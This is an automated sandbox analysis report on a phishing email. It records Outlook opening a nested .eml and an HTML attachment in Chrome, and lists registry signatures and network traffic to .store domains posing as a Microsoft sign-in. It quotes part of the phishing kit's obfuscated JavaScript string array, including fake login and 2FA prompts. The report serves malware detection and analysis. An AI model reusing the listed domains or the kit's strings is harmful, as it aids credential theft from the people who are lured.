Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
original (37).eml

Overview

General Information

Sample name:original (37).eml
Analysis ID:1513770
MD5:46780ed985e098575251fbda415651d7
SHA1:dc4d7804eb78e03f8b07f4ce7543c539ec063ba5
SHA256:ebaa85b67c633784b7bf51dfa0f217887c40b71724af99857e114809bb37e4b0
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found HTTP page in a blob
Javascript uses Clearbit API to dynamically determine company logos
Detected TCP or UDP traffic on non-standard ports
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6368 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\original (37).eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6932 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "9234D241-658A-4F1A-893D-2B99936CB692" "B03A8BDE-5D96-439A-A9A2-223F00FA92C7" "6368" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • OUTLOOK.EXE (PID: 6788 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\phish_alert_sp2_2.0.0.0.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • chrome.exe (PID: 5488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\Play_VM-NowVWAV.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1984,i,11331343023274198112,16441502776554874557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Office Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6368, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
Sigma detected: Outlook Security Settings Updated - Registry
Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6368, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Found HTTP page in a blob
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baDOM page: Blob-based
Javascript uses Clearbit API to dynamically determine company logos
Source: https://ksvbotech.store/gesp/xls/0xa937eg29be0xcs.jsHTTP Parser: var _0x7704 = [ 'ready', '#ai', '#next', '.logoimg', 'src', 'https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico', '#div1', '#div2', '#aich', '#error', '#submit-btn', '#div4', '#verify-2fa', '#div5', '#sign-in-another-way', '#div6', '#verify-text-2fa', 'https://logo.clearbit.com/', 'show', '1|2|3|4|0', 'head', '#pr', '#div3', 'success', '#user-email-otc', 'two_way_voice', '2|4|3|0|1', 'your\x20account\x20or\x20password\x20is\x20incorrect.\x20if\x20you\x20don\x27t\x20remember\x20your\x20password,\x20<a\x20href=\x27#\x27>reset\x20it\x20now</a>', '1|4|0|2|3', 'sorry,\x20your\x20sign-in\x20timed\x20out.\x20please\x20sign\x20in\x20again.', '#msg', 'internal\x20server\x20error.', 'json', '#msg-2fa', 'incorrect\x202fa\x20code.\x20try\x20again.', '#2fa-code', 'websocket\x20connection\x20closed', ...
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baHTTP Parser: Number of links: 0
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baHTTP Parser: <input type="password" .../> found but no <form action="...
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baHTTP Parser: Title: Microsoft Office does not match URL
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baHTTP Parser: Invalid link: Forgot Password?
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baHTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/ZVHF1XTO/Play_VM-NowVWAV.htmlHTTP Parser: No favicon
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baHTTP Parser: No favicon
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baHTTP Parser: No <meta name="author".. found
Source: blob:https://ksvbotech.store/87a84b40-d177-4cc6-9e01-21c142cae0baHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.174.100.20:8020
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: global trafficDNS traffic detected: DNS query: ksvbotech.store
Source: global trafficDNS traffic detected: DNS query: sopbtech.store
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
Source: global trafficDNS traffic detected: DNS query: server.povbtech.store
Source: global trafficDNS traffic detected: DNS query: _8020._https.server.povbtech.store
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.winEML@20/33@24/85
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240919T0536250808-6368.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\original (37).eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "9234D241-658A-4F1A-893D-2B99936CB692" "B03A8BDE-5D96-439A-A9A2-223F00FA92C7" "6368" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\phish_alert_sp2_2.0.0.0.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "9234D241-658A-4F1A-893D-2B99936CB692" "B03A8BDE-5D96-439A-A9A2-223F00FA92C7" "6368" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\Play_VM-NowVWAV.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1984,i,11331343023274198112,16441502776554874557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\phish_alert_sp2_2.0.0.0.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZVHF1XTO\Play_VM-NowVWAV.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1984,i,11331343023274198112,16441502776554874557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
